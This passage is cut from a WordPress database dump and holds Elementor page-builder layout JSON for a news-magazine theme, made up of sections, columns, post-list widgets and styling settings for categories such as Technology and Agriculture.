",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#04f7a2\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"choose_column\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1307,460,'_elementor_version','0.4'),(1308,460,'_elementor_css','a:3:{s:4:\"time\";i:1508895151;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1309,461,'_elementor_edit_mode','builder'),(1310,461,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_backgrou